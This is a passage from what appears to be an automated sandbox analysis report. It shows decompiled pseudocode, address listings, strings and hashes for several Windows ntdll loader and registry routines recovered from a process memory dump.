				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E0360934A() != 0) {
								_t159 = E0367A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x36e5780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E03675510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x36e5780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E0360849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E03608999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E03608999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x36e5c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x36e5c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E03612280(_t92, 0x36e86cc);
															_t94 = E036C9DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E036261A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x36e5c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E03608A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x36e5c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x36e5c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E0363F380(_t136, 0x35d1184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E03612280(_t108, 0x36e86cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E036261A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E036C9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E0360FFB0(_t118, _t156, 0x36e86cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E03639A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}

0x03608799
0x0360879d
0x036087a1
0x036087a3
0x036087a8
0x036087c3
0x036087c3
0x036087c8
0x036087d1
0x036087d4
0x036087d8
0x036087e5
0x036087ec
0x03659bfe
0x03659c00
0x03659c02
0x03659c08
0x03659c0d
0x03659c0f
0x03659c14
0x03659c2d
0x03659c32
0x03659c37
0x03659c3a
0x03659c3c
0x03659c42
0x03659c42
0x03659c3c
0x03659c02
0x036087da
0x036087df
0x036087e3
0x00000000
0x00000000
0x036087e3
0x036087f2
0x00000000
0x036087fb
0x036087fd
0x036087fe
0x0360880e
0x0360880f
0x03608810
0x03608814
0x0360881a
0x0360881c
0x0360881f
0x03608821
0x03608822
0x03608824
0x03608826
0x0360882c
0x0360882e
0x03659c48
0x03659c48
0x03608834
0x03608834
0x03608837
0x00000000
0x00000000
0x03608837
0x0360882e
0x0360883d
0x03608840
0x03608843
0x03608846
0x03608849
0x0360884c
0x0360884e
0x03608850
0x03608852
0x03608854
0x03608857
0x036088b4
0x036088b6
0x036088b6
0x03608859
0x03608859
0x03608859
0x03608861
0x03608866
0x0360886a
0x0360893d
0x03608941
0x00000000
0x03608947
0x03608947
0x0360894a
0x0360894c
0x00000000
0x03608952
0x03608955
0x0360895a
0x0360895d
0x0360895d
0x0360895f
0x03608961
0x03608961
0x03608968
0x00000000
0x00000000
0x0360896a
0x0360896b
0x0360896e
0x00000000
0x03608970
0x03608970
0x03608970
0x03608970
0x03608972
0x03608972
0x03608974
0x00000000
0x0360897a
0x0360897a
0x0360897d
0x00000000
0x03608983
0x03659c65
0x03659c6d
0x03659c72
0x03659c75
0x03659c75
0x03659c82
0x03659c86
0x03659c87
0x03659c88
0x03659c89
0x03659c8c
0x03659c90
0x03659c95
0x03659c97
0x03659ca0
0x03659ca3
0x03659ca9
0x03659ca9
0x00000000
0x03659ca9
0x03659ca3
0x00000000
0x03659c97
0x0360897d
0x00000000
0x03608974
0x03608988
0x03608992
0x03608996
0x00000000
0x03608996
0x0360894c
0x00000000
0x03608870
0x0360887b
0x0360887d
0x0360887f
0x03608881
0x03608884
0x03608884
0x03608886
0x03608889
0x0360888c
0x0360888e
0x03608891
0x03608891
0x03608898
0x00000000
0x00000000
0x0360889a
0x0360889b
0x0360889e
0x00000000
0x00000000
0x036088a0
0x036088a8
0x036088b0
0x036088b2
0x036088d3
0x036088d5
0x00000000
0x036088d7
0x036088db
0x036088dc
0x036088e0
0x036088e8
0x036088ee
0x036088f0
0x036088f3
0x036088fc
0x03608901
0x03608906
0x0360890c
0x0360890c
0x0360890f
0x03608916
0x03608917
0x03608918
0x03608919
0x0360891a
0x0360891f
0x03608921
0x03659c52
0x03659c55
0x03659c5b
0x03659cac
0x03659cc0
0x03659cc0
0x03659c55
0x03608927
0x03608927
0x0360892f
0x03608933
0x00000000
0x036088f5
0x036088f5
0x00000000
0x036088f7
0x036088f7
0x036088fa
0x00000000
0x00000000
0x00000000
0x00000000
0x036088fa
0x036088f5
0x036088f3
0x00000000
0x036088d5
0x00000000
0x036088b2
0x036088c9
0x00000000
0x036088c9
0x0360887f
0x0360886a
0x03608857
0x03608852
0x036088bf
0x036088bf
0x036087aa
0x036087ad
0x036087ae
0x036087b4
0x036087b5
0x036087b6
0x036087b8
0x036087bd
0x036087c1
0x036087f4
0x036087fa
0x00000000
0x00000000
0x00000000
0x036087c1
0x00000000

Strings

minkernel\ntdll\ldrsnap.c, xrefs: 03659C28
LdrpDoPostSnapWork, xrefs: 03659C1E
LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 03659C18

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
API String ID: 0-1948996284
Opcode ID: 99dbb71c006429f270281759ace9cdc9fc5c0d3f6d648481cc919128350dc8d0
Instruction ID: 73fe1e680ca3dd5c8bbbd1b9aa72603e5bc7fc42b1a723d1b66767ab3bf3cb49
Opcode Fuzzy Hash: 99dbb71c006429f270281759ace9cdc9fc5c0d3f6d648481cc919128350dc8d0
Instruction Fuzzy Hash: 7F91EE31A0021ADFDB1CDF58C5C2ABBB7B5FF45314B1840A9E945AB286EB70ED05CB94

Uniqueness

Uniqueness Score: -1.00%

Function 03607E41, Relevance: 3.9, Strings: 3, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E03607E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E0360CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E035FC9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x36e5780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E03675510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x36e5780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E03617D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E03617D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E03677016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E03617D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E03617D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E03677016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E0362A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E035FB1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}

0x03607e4c
0x03607e50
0x03607e55
0x03607e58
0x03607e5d
0x03607e71
0x03607f33
0x03607e77
0x03607e77
0x03607e79
0x03607e79
0x03607e7e
0x03607f45
0x03659848
0x00000000
0x03659848
0x03607f4e
0x03607f53
0x03607f5a
0x00000000
0x00000000
0x0365985a
0x03659862
0x03659866
0x00000000
0x0365986c
0x00000000
0x0365986c
0x03607e84
0x03607e84
0x03607e8d
0x03659871
0x03607eb8
0x03607ec0
0x03607ec0
0x03607e9a
0x0365987e
0x00000000
0x00000000
0x03659884
0x0365988b
0x036598a7
0x036598ac
0x036598b1
0x036598b6
0x036598b8
0x036598b8
0x036598b9
0x00000000
0x036598b9
0x03607ea0
0x03607ea7
0x00000000
0x00000000
0x03607eac
0x03607eb1
0x03607ec6
0x03607ed0
0x036598cc
0x03607ed6
0x03607ed6
0x03607ed6
0x03607ede
0x03607ee3
0x036598e3
0x036598f0
0x03659902
0x036598f2
0x036598fb
0x036598fb
0x03659907
0x0365991d
0x0365991d
0x03659907
0x036598e3
0x03607ef0
0x03607f14
0x03607f14
0x03607f1e
0x03659946
0x03607f24
0x03607f24
0x03607f24
0x03607f2c
0x0365996a
0x03659975
0x03659975
0x0365997e
0x03659993
0x03659993
0x0365997e
0x00000000
0x03607ef2
0x03607efc
0x03607f0a
0x03607f0e
0x03659933
0x00000000
0x03659933
0x00000000
0x03607f0e
0x00000000
0x00000000
0x00000000
0x03607eb1

Strings

LdrpCompleteMapModule, xrefs: 03659898
minkernel\ntdll\ldrmap.c, xrefs: 036598A2
Could not validate the crypto signature for DLL %wZ, xrefs: 03659891

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: 79ab108c327367932fe45123ea47d9737a2f7ff7e64a9e76ba22b3f96d938572
Instruction ID: 31666246516b621e3a0a1bb1f585e146db94246edff77629adb50e75728df5e5
Opcode Fuzzy Hash: 79ab108c327367932fe45123ea47d9737a2f7ff7e64a9e76ba22b3f96d938572
Instruction Fuzzy Hash: E2511035A01745DBDB29CB68CA45B2BBBE8FB01314F0806A9E8529B3E1D770FD01CB91

Uniqueness

Uniqueness Score: -1.00%

Function 035FE620, Relevance: 3.9, Strings: 3, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E035FE620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E035FF358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E036395D0();
						}
						if(_t78 != 0) {
							L036177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E0363FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E0363BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E03639600();
					if(_t97 < 0) {
						goto L6;
					}
					E0363BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L035FF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E0363BB40(_t83, _t102 + 0x24, _t78);
								if(L036043C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E0363BB40(_t84, _t102 + 0x24, _t94);
									if(L036043C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}

0x035fe620
0x035fe628
0x035fe62f
0x035fe631
0x035fe635
0x035fe637
0x035fe63e
0x03655503
0x03655503
0x035fe64c
0x035fe64c
0x035fe651
0x00000000
0x00000000
0x035fe661
0x035fe665
0x0365542a
0x035fe715
0x035fe71a
0x035fe71c
0x035fe720
0x035fe720
0x035fe727
0x035fe736
0x035fe736
0x035fe743
0x035fe743
0x035fe673
0x035fe678
0x035fe67d
0x035fe682
0x035fe685
0x035fe692
0x035fe69b
0x035fe6a3
0x035fe6ad
0x035fe6b1
0x035fe6b2
0x035fe6bb
0x035fe6bf
0x035fe6c0
0x035fe6c8
0x035fe6cc
0x035fe6d5
0x035fe6d9
0x00000000
0x00000000
0x035fe6e5
0x035fe6ea
0x035fe6f9
0x035fe70b
0x035fe70f
0x03655439
0x0365545e
0x0365545e
0x00000000
0x0365545e
0x0365543b
0x0365543e
0x03655440
0x03655445
0x03655472
0x03655475
0x0365548d
0x03655493
0x036554a9
0x00000000
0x00000000
0x036554ab
0x036554b4
0x036554bc
0x036554c8
0x036554de
0x036554fb
0x036554e0
0x036554e6
0x036554eb
0x036554eb
0x036554de
0x00000000
0x036554bc
0x03655477
0x0365547a
0x03655480
0x03655483
0x03655486
0x0365548b
0x00000000
0x00000000
0x00000000
0x0365548b
0x00000000
0x00000000
0x00000000
0x00000000
0x03655447
0x03655447
0x03655447
0x03655447
0x0365544e
0x00000000
0x00000000
0x03655450
0x03655452
0x03655455
0x0365545a
0x00000000
0x00000000
0x00000000
0x0365545c
0x0365546a
0x0365546d
0x0365546f
0x00000000
0x0365546f
0x035fe70f

Strings

InstallLanguageFallback, xrefs: 035FE6DB
\Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 035FE68C
@, xrefs: 035FE6C0

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
API String ID: 0-1757540487
Opcode ID: c2426e97fd25d1f57c39def28612d8787470107ef6f72b9ca3c24b07d3765620
Instruction ID: ab3ce7dae7ba78e7c7420736721c2d1399f385147892498e65a78927607c8d71
Opcode Fuzzy Hash: c2426e97fd25d1f57c39def28612d8787470107ef6f72b9ca3c24b07d3765620
Instruction Fuzzy Hash: D951EF765093419BC724DF25C844A6BB3E8BF89715F09092EFA86DB360EB34D904C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 036BE539, Relevance: 2.8, Strings: 2, Instructions: 261
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E036BE539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E036BBBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E036BBCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E036BAFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E03639730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E036BA80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E036BA854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E03639730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E036BA80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E036BA854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E03612280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E0360B090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E0360FFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E03617D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E036AFEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}

0x036be547
0x036be549
0x036be54f
0x036be553
0x036be557
0x036be55a
0x036be55c
0x036be55f
0x036be561
0x036be567
0x036be56b
0x036be7e2
0x00000000
0x036be571
0x036be575
0x036be577
0x036be57b
0x036be57c
0x036be57d
0x036be57e
0x036be57f
0x036be588
0x036be58f
0x036be591
0x036be592
